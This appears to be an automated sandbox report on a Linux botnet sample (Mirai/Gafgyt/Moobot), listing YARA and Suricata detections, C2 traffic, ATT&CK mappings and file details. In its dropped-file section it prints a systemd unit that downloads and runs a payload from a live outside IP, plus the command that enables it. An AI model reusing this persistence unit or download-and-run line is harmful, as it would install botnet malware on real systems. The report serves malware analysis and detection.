Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16

Source: classification engine

Classification label: mal100.troj.linELF@0/2@32/0

Source: /tmp/na.elf (PID: 5454)

Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"

Jump to behavior

Source: /bin/sh (PID: 5455)

Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.service

Jump to behavior

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR

Remote Access Functionality

Detected Mirai

Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
Source: Traffic	Suricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)

Yara detected Gafgyt

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY

Yara detected Moobot

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR

Yara detected Okiru

Source: Yara match	File source: na.elf, type: SAMPLE
Source: Yara match	File source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	Direct Volume Access	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
na.elf	58%	ReversingLabs	Linux.Backdoor.Mirai
na.elf	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		unknown
yi0key.heleh.com.vn	91.200.103.117	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.200.103.117/%s	na.elf	false		unknown
http://91.200.103.117/bolubotnetx86_64	na.elf, 5452.1.00000000016e2000.00000000016e4000.rw-.sdmp, sbolo.service.12.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.200.103.117	yi0key.heleh.com.vn	Germany		30823	COMBAHTONcombahtonGmbHDE	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
91.200.103.117	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.24
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.24
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.25
	na.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.24
yi0key.heleh.com.vn	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COMBAHTONcombahtonGmbHDE	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	7QiAmg58Jk.exe	Get hash	malicious	Metasploit, Meterpreter, Xmrig	Browse	194.59.31.31
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	194.59.31.225
	9YOOBuBZtj.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.30.201
	6Zx9GI028y.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.30.201
	4ZVhm9dOfO.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.30.201
	y4FSQMICGJ.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.30.201

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.12849862339047
Encrypted:	false
SSDEEP:	6:z80WuKyRZAMzdK+ann0RJ5R0a+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRJ+GWRg+GWRuwjp+GWRut
MD5:	C682687F0E51823E3582ECEC267221B7
SHA1:	051373AD52580939B63911E06AF69164EE8698C2
SHA-256:	C4D124C17EF76CD568EE4A5471AB068FE9EF0273A9A371C884A5F5A4F3B78096
SHA-512:	0035EF8123F5DFF42F7FDEA6A0950FC21EC64EE919E4E7FDA41D98A468D91266EFB55939AB8445F3E0437DEF873DC2B63BA1C1F7E989474EA89D03BFEEB7A430
Malicious:	false
Reputation:	low
Preview:	[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetx86_64.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.2944297938746425
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	na.elf
File size:	149'016 bytes
MD5:	535cff3a16d579f89346b0916110d25e
SHA1:	a6f65c0f3be7ee71b23973624c60f89ce3bf8f3b
SHA256:	c6be94538af0c32feb17a797fb510bac68f85310700df4b84ea6bb31aa5b5bf2
SHA512:	9de76ca947b8a6fb5346d2ca39f8a5876de0ce537213e7c39ab1217cd940361ddbc00bf04d04c68acff9ad1f0f4fbf435a57732197dff6a519c64a08282a666c
SSDEEP:	3072:fJcU1mYFZwN16ktf9BJa5+IDyiExF3Ht+WNOSbqgHv9uHLWB2O/:RcU1HFiN16krMVqd3kkEY2O/
TLSH:	98E3390BB5C084FDC4DAC1B44BAEF23AD972F46C1238B26B27C4AA265E4DE305F5D615
File Content Preview:	.ELF..............>.......@.....@........C..........@.8...@.......................@.......@...............................................Q.......Q.....p.......8...............Q.td....................................................H...._....Z...H........

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400194
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	148376
Section Header Size:	64
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x4000e8	0xe8	0x13	0x0	0x6	AX	1
.text	PROGBITS	0x400100	0x100	0x18286	0x0	0x6	AX	16
.fini	PROGBITS	0x418386	0x18386	0xe	0x0	0x6	AX	1
.rodata	PROGBITS	0x4183a0	0x183a0	0x3140	0x0	0x2	A	32
.ctors	PROGBITS	0x51b4e8	0x1b4e8	0x18	0x0	0x3	WA	8
.dtors	PROGBITS	0x51b500	0x1b500	0x10	0x0	0x3	WA	8
.data	PROGBITS	0x51b520	0x1b520	0x8e38	0x0	0x3	WA	32
.bss	NOBITS	0x524360	0x24358	0xf2c0	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x24358	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x1b4e0	0x1b4e0	6.3777	0x5	R E	0x100000	.init .text .fini .rodata
LOAD	0x1b4e8	0x51b4e8	0x51b4e8	0x8e70	0x18138	0.2295	0x6	RW	0x100000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T16:23:18.977987+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60012	91.200.103.117	23561	TCP
2024-10-07T16:23:23.800327+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60014	91.200.103.117	23561	TCP
2024-10-07T16:23:28.351917+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60016	91.200.103.117	23561	TCP
2024-10-07T16:23:35.989973+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60018	91.200.103.117	23561	TCP
2024-10-07T16:23:47.820418+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60020	91.200.103.117	23561	TCP
2024-10-07T16:23:56.446305+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60022	91.200.103.117	23561	TCP
2024-10-07T16:24:08.113075+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60024	91.200.103.117	23561	TCP
2024-10-07T16:24:10.727857+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60026	91.200.103.117	23561	TCP
2024-10-07T16:24:15.442946+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60028	91.200.103.117	23561	TCP
2024-10-07T16:24:18.156729+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60030	91.200.103.117	23561	TCP
2024-10-07T16:24:21.784212+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60032	91.200.103.117	23561	TCP
2024-10-07T16:24:32.795048+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60034	91.200.103.117	23561	TCP
2024-10-07T16:24:43.413248+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60036	91.200.103.117	23561	TCP
2024-10-07T16:24:49.061773+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60038	91.200.103.117	23561	TCP
2024-10-07T16:24:52.790287+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60040	91.200.103.117	23561	TCP
2024-10-07T16:24:59.417908+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60042	91.200.103.117	23561	TCP
2024-10-07T16:25:08.087657+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60044	91.200.103.117	23561	TCP
2024-10-07T16:25:12.768389+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60046	91.200.103.117	23561	TCP
2024-10-07T16:25:22.401937+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60048	91.200.103.117	23561	TCP
2024-10-07T16:25:25.059438+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.13	60050	91.200.103.117	23561	TCP
